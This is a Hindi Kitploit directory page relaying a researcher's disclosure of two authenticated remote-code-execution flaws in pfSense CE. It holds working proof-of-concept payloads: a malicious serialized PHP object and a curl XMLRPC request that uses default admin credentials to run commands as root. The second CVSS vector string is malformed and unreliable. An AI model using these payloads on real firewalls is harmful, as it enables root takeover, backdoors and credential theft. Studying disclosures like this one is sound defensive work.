Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/privlabs/cve-2025-69690-cve-2025-69691
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubprivlabs/cve-2025-69690-cve-2025-69691

CVE-2025-69690-CVE-2025-69691

Netgate pfSense CE 2.7.2 और 2.8.0 में प्रमाणित RCE

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

🔐 CVE-2025-69690 & CVE-2025-69691

Netgate pfSense Community Edition में प्रमाणित रिमोट कोड निष्पादन

CVE CVE CVSS Vendor Status


📋 सारांश

क्षेत्रविवरण
शोधकर्ताNelson Adhepeau (@privlabs)
विक्रेताNetgate
उत्पादpfSense Community Edition
संस्करण2.7.2 और 2.8.0
प्रकारप्रमाणित रिमोट कोड निष्पादन
प्रकटीकरणफ़रवरी 2026
विक्रेता को सूचित किया गया2 दिसंबर, 2025
CVE निर्दिष्ट28 जनवरी, 2026

⚠️ अस्वीकरण

यह शोध केवल शैक्षिक और सुरक्षा जागरूकता उद्देश्यों के लिए पृथक प्रयोगशाला वातावरण में किया गया था और सुरक्षा जागरूकता उद्देश्यों के लिए ही। सभी निष्कर्ष प्रकाशन से पूर्व विक्रेता को जिम्मेदारीपूर्वक सूचित किए गए थे। यह सलाह उत्पादन प्रणालियों पर हमला करने का निमंत्रण नहीं है। अनधिकृत परीक्षण अवैध है।


🎯 CVE-2025-69690

असुरक्षित डिसीरियलाइज़ेशन → RCE (pfSense CE 2.7.2)

विवरण

pfSense कॉन्फ़िगरेशन पुनर्स्थापना तंत्र उपयोगकर्ता-नियंत्रित डेटा पर unserialize() को बिना क्लास व्हाइटलिस्टिंग, इनपुट सत्यापन, या सैंडबॉक्सिंग के आमंत्रित करता है।

एक दुर्भावनापूर्ण सीरियलाइज़्ड PHP ऑब्जेक्ट युक्त गढ़ा गया बैकअप फ़ाइल post_reboot_commands प्रॉपर्टी के माध्यम से मनमाने कमांड इंजेक्ट करता है, जिन्हें mwexec() के माध्यम से पूर्ण रूट विशेषाधिकारों के साथ निष्पादित किया जाता है।

हमले का प्रवाह

root@kitploit:~
[Attacker] → Login as admin
           → Upload malicious .xml backup file
           → Trigger restore
           → pfSense calls unserialize() on attacker data
           → post_reboot_commands executed via mwexec()
           → [ROOT SHELL]

प्रभावित घटक

  • config.php — पुनर्स्थापना प्रसंस्करण तर्क
  • pfsense_module_installer वर्ग — असुरक्षित डिसीरियलाइज़ेशन लक्ष्य
  • mwexec() — कमांड निष्पादन सिंक

PoC पेलोड

root@kitploit:~
O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}

प्रभाव

  • ✅ रूट के रूप में मनमाना OS कमांड निष्पादन
  • ✅ स्थायी बैकडोर स्थापना
  • ✅ फ़ायरवॉल पर पूर्ण नियंत्रण
  • ✅ क्रेडेंशियल और कॉन्फ़िगरेशन की निकासी

विक्रेता की प्रतिक्रिया

"स्वीकृत। प्रमाणित प्रशासनिक दुरुपयोग के रूप में वर्गीकृत। कोई पैच जारी नहीं किया जाएगा।" — Netgate


🎯 CVE-2025-69691

XMLRPC exec_php → RCE (pfSense CE 2.8.0)

विवरण

pfSense CE 2.8.0 एक XMLRPC विधि pfsense.exec_php उजागर करता है जो बिना सत्यापन, सैंडबॉक्सिंग, या किसी भी प्रकार के प्रतिबंध के रूट के रूप में मनमाना PHP कोड निष्पादित करता है।

एंडपॉइंट है:

  • ✅ डिफ़ॉल्ट रूप से सक्षम
  • ✅ HTTPS पर रिमोट से सुलभ
  • ✅ केवल बेसिक प्रमाणीकरण द्वारा संरक्षित
  • ✅ डिफ़ॉल्ट क्रेडेंशियल (admin:pfsense) के साथ शोषण योग्य

हमले का प्रवाह

root@kitploit:~
[Attacker] → Send XMLRPC request to /xmlrpc.php
           → Authenticate with admin:pfsense (default)
           → Call pfsense.exec_php with arbitrary PHP
           → Code executes as root, no sandboxing
           → [ROOT SHELL]

प्रभावित घटक

  • xmlrpc.php — API प्रवेश बिंदु
  • pfsense.exec_php — असुरक्षित गतिशील कोड निष्पादन
  • BasicAuth परत — अपर्याप्त पहुँच नियंत्रण

PoC

root@kitploit:~
curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php

प्रभाव

  • ✅ पूर्ण रिमोट रूट समझौता
  • ✅ मनमाना फ़ाइल पढ़ना/लिखना
  • ✅ बैकडोर तैनाती
  • ✅ फ़ायरवॉल नियमों में हेरफेर
  • ✅ सभी क्रेडेंशियल और कॉन्फ़िगरेशन की निकासी

विक्रेता की प्रतिक्रिया

"स्वीकृत। प्रमाणित उपयोगकर्ताओं के लिए अपेक्षित व्यवहार के रूप में वर्गीकृत। कोई पैच की योजना नहीं है।" — Netgate


📅 समयरेखा

root@kitploit:~
November 2025     →  Vulnerabilities discovered
December 2, 2025  →  Responsible disclosure to Netgate
                  →  Vendor acknowledged, no patch planned
January 28, 2026  →  CVE IDs assigned by MITRE
February 2026     →  Public disclosure

🔗 संदर्भ

  • 🔴 CVE-2025-69690 cve.org पर
  • 🔴 CVE-2025-69691 cve.org पर
  • 📧 पूर्ण प्रकटीकरण: [email protected]

👤 शोधकर्ता

Nelson Adhepeau — स्वतंत्र सुरक्षा शोधकर्ता

LinkedIn GitHub

📧 [email protected]

टूल डाउनलोड करें
क्षेत्रमान
CVSS v3.18.8 (उच्च)
वेक्टरAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWECWE-502, CWE-915
हमले का प्रकारप्रमाणित (व्यवस्थापक)
घटकबैकअप/पुनर्स्थापना तंत्र
क्षेत्रमान
CVSS v3.19.9 (गंभीर)
वेक्टरAV:N/AC:L/PR:L/UI:N/S:C:C:H/I:H:A
CWECWE-284, CWE-915
हमले का प्रकारप्रमाणित (रिमोट, बेसिक प्रमाणीकरण)
घटकXMLRPC API — pfsense.exec_php